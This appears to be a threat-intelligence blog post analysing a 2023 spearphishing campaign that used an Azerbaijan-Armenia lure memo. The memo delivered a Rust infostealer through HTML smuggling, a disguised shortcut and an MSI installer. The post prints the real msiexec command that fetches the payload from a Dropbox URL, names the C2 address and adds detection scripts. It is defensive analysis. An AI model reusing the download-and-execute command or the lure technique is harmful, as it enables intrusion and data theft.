Azerbaijan & Armenia Cyber Meddling

In 1923, the Soviet Union created the Nagorno-Karabakh Autonomous Oblast (an oblast is an administrative region or province) within the Azerbaijan Soviet Socialist Republic.  This oblast has a 95% ethnically Armenian population.  In 1988, Nagorno-Karabakh intended to leave Azerbaijan and join the neighboring Republic of Armenia.  While the Soviet Union was able to keep the resulting tension under control, once the USSR began to collapse, armed conflict between Azerbaijan and Armenia began for control of the Nagorno-Karabakh region.  While a ceasefire was tentatively reached in 1994 and again in 2020, tensions remain high between the two countries.

Affected platforms: Microsoft Windows
Impacted parties: Targeted management associated with an Azerbaijani company
Impact: Reconnaissance of basic computer info of targeted users
Severity level: Low

A Spearphishing Campaign Exploits the Azerbaijan-Armenia Conflict - In August 2023, FortiGuard Labs discovered an infected memo pretending to come from the current president of a company in Azerbaijan and aimed at the management teams of associated businesses.  Opening this memo downloads malware designed to gather basic information from its targets.[1]


Figure 2. Memo

This blog analyzes the attack chain, reviews the malware’s capabilities, and reveals the possible location of the threat actor behind it.

Anatomy of an Attack - FortiGuard Labs spotted this attack by finding the memo in Figure 2. The memo claims to have information about a border clash between soldiers from Azerbaijan and Armenia.


Figure 3. Attack flow

The memo is in HTML format and uses HTML smuggling to deliver a password-protected archive automatically.  This archive, as the memo suggests, contains several images. As shown in the attack diagram in Figure 3, the archive contains three clean images and one phony image.  The actual contents are illustrated below.
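A static check for the HTML smuggling pattern described above, added here as an example (not code from the original post or from FortiGuard Labs). The HTML sample is constructed and its base64 literal decodes only to a ZIP header signature plus padding; the marker list and scoring threshold are assumptions.

```python
import base64
import re

# Constructed sample standing in for a smuggling memo; it is NOT the real
# ARMENIAN_ACT_OF_AGGRESSION.pdf.html. The base64 literal decodes to a bare
# ZIP local-file-header signature (PK\x03\x04) followed by zero padding.
SAMPLE_HTML = """<html><body><p>Memo: see attached images.</p>
<script>
var b = "UEsDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
var bytes = Uint8Array.from(atob(b), c => c.charCodeAt(0));
var blob = new Blob([bytes], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "Armenian Aggression.zip";
a.click();
</script></body></html>"""

# JavaScript idioms that together characterise HTML smuggling: a client-side
# decode, assembly into a Blob, and a forced download without a server fetch.
SMUGGLING_MARKERS = [
    r"\batob\s*\(",
    r"new\s+Blob\s*\(",
    r"URL\.createObjectURL\s*\(",
    r"msSaveOrOpenBlob\s*\(",
    r"\.download\s*=",
]
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/=]{24,})[\"']")

def embedded_file_types(html: str) -> list:
    """Decode every long base64 literal and classify it by magic bytes."""
    kinds = []
    for lit in B64_LITERAL.findall(html):
        try:
            raw = base64.b64decode(lit, validate=True)
        except ValueError:
            continue  # not valid base64, so not a smuggled payload
        if raw.startswith(b"PK\x03\x04"):
            kinds.append("zip")
        elif raw.startswith(b"MZ"):
            kinds.append("pe")
        else:
            kinds.append("unknown")
    return kinds

def score_html_smuggling(html: str) -> dict:
    """Report which markers fired and what any embedded payload decodes to."""
    hits = [m for m in SMUGGLING_MARKERS if re.search(m, html)]
    kinds = embedded_file_types(html)
    suspicious = len(hits) >= 3 or "zip" in kinds or "pe" in kinds
    return {"markers": hits, "payload_types": kinds, "suspicious": suspicious}
```

A password-protected archive defeats content inspection of the payload itself, which is why the check looks at the delivery idioms and the container's magic bytes rather than at what is inside.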

Figure 4. Contents of the zip archive with parts obfuscated for PII purposes

An astute observer may notice that the first "image" is not an image file. In reality, it is a .LNK shortcut that executes the following command:

..\..\Windows\System32\msiexec.exe /i "https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0"

This command downloads an .MSI (Microsoft Installer) file. Figure 3 shows this MS installer file performing two actions when clicked.  The first action is to display an image with the same filename as the phony image shortcut (shown in the zip archive in Figure 4):

Figure 5. The phony image is shown when the .LNK shortcut is executed

This technique may fool some users into thinking the shortcut was simply an image file. But this is misdirection.  Instead, the installer simultaneously loads hidden malware into the targeted computer.
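Detection logic for the shortcut-to-msiexec step above, run over constructed process-creation events; this is an added example, not telemetry or code from the original post. The event field names, the placeholder download host and the parent-process heuristic are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events (not real telemetry from the campaign),
# shaped like the fields most EDR/Sysmon exports carry. The URL host is a
# placeholder, not the real download location.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'..\..\Windows\System32\msiexec.exe /i "https://dl.example.invalid/scl/fi/x/karabakh.jpg.msi?dl=0"'},
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /V"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\7z2301-x64.msi" /qn'},
]

LURE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".pdf")

def msiexec_remote_install(cmdline: str):
    """Return the URL when msiexec is asked to install a package over HTTP(S), else None."""
    if "msiexec" not in cmdline.lower():
        return None
    m = re.search(r'(?i)(?:/i|/package)\s+"?(https?://[^"\s]+)', cmdline)
    return m.group(1) if m else None

def lure_double_extension(url: str) -> bool:
    """True when the package name is disguised as an image or document (e.g. x.jpg.msi)."""
    name = urlparse(url).path.rsplit("/", 1)[-1].lower()
    stem, _, ext = name.rpartition(".")
    return ext == "msi" and stem.endswith(LURE_EXTS)

def triage(events):
    """Flag msiexec launches that install from a remote URL and explain why."""
    findings = []
    for ev in events:
        url = msiexec_remote_install(ev["cmdline"])
        if not url:
            continue  # local package or non-install invocation: ignore
        reasons = ["msiexec installing a package from a remote URL"]
        if lure_double_extension(url):
            reasons.append("package name carries an image/document double extension")
        if ev["parent"].lower().endswith("explorer.exe"):
            reasons.append("spawned from explorer.exe, consistent with a user opening a shortcut")
        findings.append({"url": url, "reasons": reasons})
    return findings
```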

Malware - The malicious installer creates a new folder in the user’s %APPDATA% folder called “Windows Defender Health Check.”  It also installs malware with the same name:

C:\Users\[username]\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe

Uncommon Traits - This malware is programmed in RUST, which is not the programming language of choice for most malware authors.  This makes using standard analysis tools and methods somewhat less useful.  The fact that RUST is used already makes this threat actor different.  However, this is not the only trait that makes this malware distinct.

For persistence, a temporary file is created called “24rp.xml.”  This file is used to create a scheduled task.

Figure 6. Scheduled task

Once the scheduled task is created, the .XML file is deleted.

This technique assumes that the intended targets leave their computers on overnight so the malware can execute outside regular office hours when it is less likely to be noticed.  Moreover, for even greater stealth, the malware can sleep for random amounts of time when performing its tasks.

Figure 7. Sleep between 10 and 20 minutes

Next, we will refer back to Figure 2 for another indication of how this malware attempts to stay hidden. Notice the memo is dated August 8th. We found that this malware was created the previous day by examining its compile timestamp.

Figure 8. Creation time of the malware

This short timeframe makes it virtually impossible for the malware to have been released accidentally before the attack started.

Stealing Information - Ultimately, the malware acts like an infostealer, gathering basic computer information and sending it to a C2 server.  The following commands are executed:

Figure 9. Commands executed by the malware

These commands suggest that the threat actor is still in the early stages of fully attempting to compromise its targets.  The information being gathered from these commands could be used to tailor specific attacks for each infected target.

This infostealer is unique because it also collects a list of environment variables and takes an extra step to check for any proxy servers in use.

Figure 10. Checking for proxy

If a proxy server is set, the malware understands how to route its traffic.  The malware issues a POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.

Tracking a Possible Threat Actor - Our telemetry found nothing too interesting with the C2 server itself.  However, digging into the server uncovered additional information.  Using data from PDNS and other records, the C2 server 78[.]135.73.140 does not seem to be a shared server.  This suggests the threat actor has total control and setup of the server.  With this assumption, we searched to discover more of the threat actor’s network infrastructure.  Inside the /24 subnet alone, four additional servers were revealed:

Figure 11. Partial network infrastructure

Using the August 8th date on the memo as a starting point, we searched traffic going to these servers in the month prior.  While we did not find significant amounts of traffic, we identified one IP address in Colombia that connected to the server 78[.]135.73.188 in July, for a substantial amount of time, on a port commonly used for VPN. If the threat actor wanted to hide their activity, using a VPN server under their control would accomplish the job.  The Colombia IP address belongs to a cellular company, which suggests the user may have been using a mobile hotspot.  If so, this may be the location of the attacker.

Conclusion - The threat actor in this campaign uses a few advanced techniques, including RUST and after-hours execution, to help it stay under the radar and make analysis more difficult.  The size of the network infrastructure also suggests this threat actor is not a run-of-the-mill malware developer but someone with access to resources.  

Using a geopolitical lure indicates that this threat actor is plugged in and knows how to target specific users.


File IOCs


Network IOCs


Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and has reported extensively on AI technology.  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com    


[1] https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia?lctg=141970831
